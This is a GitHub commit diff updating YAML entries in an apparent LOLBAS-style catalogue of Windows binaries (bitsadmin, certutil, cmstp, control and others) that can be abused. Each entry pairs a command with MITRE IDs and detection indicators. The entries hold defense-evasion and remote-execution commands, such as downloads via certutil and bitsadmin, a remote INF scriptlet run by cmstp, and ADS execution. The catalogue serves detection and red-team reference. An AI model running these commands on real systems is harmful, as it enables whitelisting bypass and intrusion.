Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Added more fields to every binary from new template, Mitre, usecase etc
- Loading branch information
1 parent
3b331ee
commit 54d9f54
Showing
238 changed files
with
5,936 additions
and
4,386 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,14 +1,25 @@ | ||
| --- | ||
| name: Atbroker.exe | ||
| description: | ||
| description: Helper binary for Assistive Technology (AT) | ||
| functions: | ||
| execute: | ||
| - description: Start a registered Assistive Technology (AT). Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. | ||
| - description: Start a registered Assistive Technology (AT). | ||
| code: ATBroker.exe /start malware | ||
| mitreid: T1218 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1218 | ||
| operatingsystem: Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Executes code defined in registry for a new AT. Modifications must be made to the system registry to either register or modify an existing Assistibe Technology (AT) service entry. | ||
| resources: | ||
| - resource: http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/ | ||
| fullpath: | ||
| - path: C:\Windows\System32\Atbroker.exe | ||
| - path: C:\Windows\SysWOW64\Atbroker.exe | ||
| notes: Thanks to Adam - @hexacorn | ||
| --- | ||
| detection: | ||
| - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\Configuration | ||
| - IOC: Changes to HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATs | ||
| - IOC: Unknown AT starting C:\Windows\System32\ATBroker.exe /start malware | ||
| acknowledgement: | ||
| - Person: Adam | ||
| Handle: '@hexacorn' | ||
| --- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,14 +1,31 @@ | ||
| --- | ||
| name: bash.exe | ||
| description: Part of the Windows subsystem for Linux. Must be enabled for binary to be present. | ||
| name: Bash.exe | ||
| description: File used by Windows subsystem for Linux | ||
| functions: | ||
| execute: | ||
| - description: Execute calc.exe | ||
| - description: Executes calc.exe from bash.exe | ||
| code: bash.exe -c calc.exe | ||
| resources: | ||
| - resource: | ||
| fullpath: | ||
| - path: c:\windows\system32\bash.exe | ||
| - path: c:\windows\sysWOW64\bash.exe | ||
| notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016 | ||
| --- | ||
| mitreid: T1218 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1218 | ||
| operatingsystem: Windows 10 | ||
| privileges: User | ||
| usecase: Performs execution of specified file, can be used as a defensive evasion. | ||
| awl bypass: | ||
| - description: Executes calc.exe from bash.exe | ||
| code: bash.exe -c calc.exe | ||
| mitreid: T1218 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1218 | ||
| operatingsystem: Windows 10 | ||
| privileges: User | ||
| usecase: Performs execution of specified file, can be used to bypass Application Whitelisting. | ||
| resources: | ||
| - resource: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules | ||
| fullpath: | ||
| - path: C:\Windows\System32\bash.exe | ||
| - path: C:\Windows\SysWOW64\bash.exe | ||
| detection: | ||
| - IOC: Child process from bash.exe | ||
| acknowledgement: | ||
| - Person: Alex Ionescu | ||
| Handle: '@aionescu' | ||
| --- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,32 +1,55 @@ | ||
| --- | ||
| name: bitsadmin.exe | ||
| description: Used for background intelligent transfer. | ||
| name: Bitsadmin.exe | ||
| description: Used for managing background intelligent transfer | ||
| functions: | ||
| ads: | ||
| - description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. It will execute the file located in the Alternate data stream. | ||
| code: bitsadmin /create 1 | ||
| bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe | ||
| bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL | ||
| bitsadmin /RESUME 1 | ||
| bitsadmin /complete 1 | ||
| execute: | ||
| - description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||
| code: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset | ||
| mitreid: T1218 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1218 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Execute binary file specified. Can be used as a defensive evasion. | ||
| download: | ||
| - description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||
| code: bitsadmin /create 1 | ||
| bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe | ||
| bitsadmin /RESUME 1 | ||
| bitsadmin /complete 1 | ||
| code: bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1 | ||
| mitreid: T1105 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1105 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Download file from Internet | ||
| copy: | ||
| - description: One-liner for copying file | ||
| - description: Command for copying cmd.exe to another folder | ||
| code: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /RESUME 1 & bitsadmin /Complete 1 & bitsadmin /reset | ||
| execute: | ||
| - description: One-liner that creates a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command, then resume and complete the job. | ||
| code: bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset | ||
| resources: | ||
| mitreid: T1105 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1105 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Copy file | ||
| ads: | ||
| - description: Create a bitsadmin job named 1, add cmd.exe to the job, configure the job to run the target command from an Alternate data stream, then resume and complete the job. | ||
| code: bitsadmin /create 1 bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\1.txt:cmd.exe NULL bitsadmin /RESUME 1 bitsadmin /complete 1 | ||
| mitreid: T1096 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1096 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Performs execution of specified file in the alternate data stream, can be used as a defensive evasion or persistence technique. | ||
| resources: | ||
| - resource: https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53 | ||
| - resource: https://www.youtube.com/watch?v=_8xJaaQlpBo | ||
| - resource: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f | ||
| fullpath: | ||
| - path: c:\Windows\System32\bitsadmin.exe | ||
| - path: c:\Windows\SysWOW64\bitsadmin.exe | ||
| notes: Thanks to Rob Fuller - @mubix , Chris Gates - @carnal0wnage, Oddvar Moe - @oddvarmoe | ||
| --- | ||
| fullpath: | ||
| - path: C:\Windows\System32\bitsadmin.exe | ||
| - path: C:\Windows\SysWOW64\bitsadmin.exe | ||
| detection: | ||
| - IOC: Child process from bitsadmin.exe | ||
| - IOC: bitsadmin creates new files | ||
| - IOC: bitsadmin adds data to alternate data stream | ||
| acknowledgement: | ||
| - Person: Rob Fuller | ||
| Handle: '@mubix' | ||
| - Person: Chris Gates | ||
| Handle: '@carnal0wnage' | ||
| - Person: Oddvar Moe | ||
| Handle: '@oddvarmoe' | ||
| --- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,24 +1,52 @@ | ||
| --- | ||
| name: certutil.exe | ||
| name: Certutil.exe | ||
| description: Windows binary used for handeling certificates | ||
| functions: | ||
| download: | ||
| - description: Download and save 7zip to disk in the current folder. | ||
| code: certutil.exe -urlcache -split -f http://7-zip.org/a/7z1604-x64.exe 7zip.exe | ||
| ads: | ||
| - description: Download and save a PS1 file to an Alternate Data Stream (ADS). | ||
| code: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | ||
| mitreid: T1105 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1105 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Download file from Internet | ||
| encode: | ||
| - description: Command to encode a file using Base64 | ||
| code: certutil -encode inputFileName encodedOutputFileName | ||
| mitreid: T1027 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1027 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Encode files to evade defensive measures | ||
| decode: | ||
| - description: Command to decode a Base64 encoded file. | ||
| code: certutil -decode encodedInputFileName decodedOutputFileName | ||
| resources: | ||
| mitreid: T1140 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1140 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Decode files to evade defensive measures | ||
| ads: | ||
| - description: Download and save a PS1 file to an Alternate Data Stream (ADS). | ||
| code: certutil.exe -urlcache -split -f https://raw.githubusercontent.com/Moriarty2016/git/master/test.ps1 c:\temp:ttt | ||
| mitreid: T1105 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1105 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Download file from Internet and save it in an NTFS Alternate Data Stream | ||
| resources: | ||
| - resource: https://twitter.com/Moriarty_Meng/status/984380793383370752 | ||
| - resource: https://twitter.com/mattifestation/status/620107926288515072 | ||
| fullpath: | ||
| - path: c:\windows\system32\certutil.exe | ||
| - path: c:\windows\sysWOW64\certutil.exe | ||
| notes: Thanks to Matt Graeber - @mattifestation, Moriarty - @Moriarty2016 | ||
| --- | ||
| fullpath: | ||
| - path: C:\Windows\System32\certutil.exe | ||
| - path: C:\Windows\SysWOW64\certutil.exe | ||
| detection: | ||
| - IOC: Certutil.exe creating new files on disk | ||
| - IOC: Useragent Microsoft-CryptoAPI/10.0 | ||
| - IOC: Useragent CertUtil URL Agent | ||
| acknowledgement: | ||
| - Person: Matt Graeber | ||
| Handle: '@mattifestation' | ||
| - Person: Moriarty | ||
| Handle: '@moriarty2016' | ||
| --- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,15 +1,24 @@ | ||
| --- | ||
| name: cmdkey.exe | ||
| name: Cmdkey.exe | ||
| description: creates, lists, and deletes stored user names and passwords or credentials. | ||
| functions: | ||
| credentials: | ||
| - description: List cached credentials. | ||
| - description: List cached credentials | ||
| code: cmdkey /list | ||
| resources: | ||
| mitreid: T1078 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1078 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Get credential information from host | ||
| resources: | ||
| - resource: https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation | ||
| - resource: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey | ||
| fullpath: | ||
| - path: c:\windows\system32\cmdkey.exe | ||
| - path: c:\windows\sysWOW64\cmdkey.exe | ||
| notes: | ||
| --- | ||
| fullpath: | ||
| - path: C:\Windows\System32\cmdkey.exe | ||
| - path: C:\Windows\SysWOW64\cmdkey.exe | ||
| detection: | ||
| - IOC: Usage of this command could be an IOC | ||
| acknowledgement: | ||
| - Person: | ||
| Handle: '' | ||
| --- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,21 +1,39 @@ | ||
| --- | ||
| name: cmstp.exe | ||
| description: Installs or removes a Connection Manager service profile. Used without optional parameters, cmstp installs a service profile with default settings appropriate to the operating system and to the user's permissions. | ||
| name: Cmstp.exe | ||
| description: Installs or removes a Connection Manager service profile. | ||
| functions: | ||
| execute: | ||
| - description: Silently installs a specially formatted local .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. | ||
| code: cmstp.exe /ni /s c:\cmstp\CorpVPN.inf | ||
| mitreid: T1191 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1191 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Execute code hidden within an inf file. Download and run scriptlets from internet. | ||
| awl bypass: | ||
| - description: Silently installs a specially formatted remote .INF without creating a desktop icon. The .INF file contains a UnRegisterOCXSection section which executes a .SCT file using scrobj.dll. | ||
| code: cmstp.exe /ni /s https://raw.githubusercontent.com/api0cradle/LOLBAS/master/OSBinaries/Payload/Cmstp.inf | ||
| resources: | ||
| mitreid: T1191 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1191 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Execute code hidden within an inf file. Execute code directly from Internet. | ||
| resources: | ||
| - resource: https://twitter.com/NickTyrer/status/958450014111633408 | ||
| - resource: https://gist.github.com/NickTyrer/bbd10d20a5bb78f64a9d13f399ea0f80 | ||
| - resource: https://gist.github.com/api0cradle/cf36fd40fa991c3a6f7755d1810cc61e | ||
| - resource: https://oddvar.moe/2017/08/15/research-on-cmstp-exe/ | ||
| - resource: https://gist.githubusercontent.com/tylerapplebaum/ae8cb38ed8314518d95b2e32a6f0d3f1/raw/3127ba7453a6f6d294cd422386cae1a5a2791d71/UACBypassCMSTP.ps1 | ||
| - resource: https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmstp | ||
| fullpath: | ||
| - path: c:\windows\system32\cmstp.exe | ||
| - path: c:\windows\sysWOW64\cmstp.exe | ||
| notes: Thanks to Oddvar Moe - @oddvarmoe, Nick Tyrer - @NickTyrer | ||
| --- | ||
| fullpath: | ||
| - path: C:\Windows\System32\cmstp.exe | ||
| - path: C:\Windows\SysWOW64\cmstp.exe | ||
| detection: | ||
| - IOC: Execution of cmstp.exe should not be normal unless VPN is in use | ||
| - IOC: Cmstp.exe communication towards internet and getting files | ||
| acknowledgement: | ||
| - Person: Oddvar Moe | ||
| Handle: '@oddvarmoe' | ||
| - Person: Nick Tyrer | ||
| Handle: '@NickTyrer' | ||
| --- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -1,17 +1,27 @@ | ||
| --- | ||
| name: control.exe | ||
| description: | ||
| name: Control.exe | ||
| description: Binary used to launch controlpanel items in Windows | ||
| functions: | ||
| ads: | ||
| - description: Execute evil.dll which is stored in an Alternate Data Stream (ADS). | ||
| code: control.exe c:\windows\tasks\file.txt:evil.dll | ||
| resources: | ||
| mitreid: T1196 | ||
| mitrelink: https://attack.mitre.org/wiki/Technique/T1196 | ||
| operatingsystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 | ||
| privileges: User | ||
| usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism | ||
| resources: | ||
| - resource: https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/ | ||
| - resource: https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/ | ||
| - resource: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ | ||
| - resource: https://twitter.com/bohops/status/955659561008017409 | ||
| fullpath: | ||
| - path: c:\windows\system32\control.exe | ||
| - path: c:\windows\sysWOW64\control.exe | ||
| notes: Thanks to Jimmy - @bohops | ||
| --- | ||
| - resource: https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items | ||
| - resource: https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/ | ||
| fullpath: | ||
| - path: C:\Windows\System32\control.exe | ||
| - path: C:\Windows\SysWOW64\control.exe | ||
| detection: | ||
| - IOC: Control.exe executing files from alternate data streams. | ||
| acknowledgement: | ||
| - Person: Jimmy | ||
| Handle: '@bohops' | ||
| --- |
Oops, something went wrong.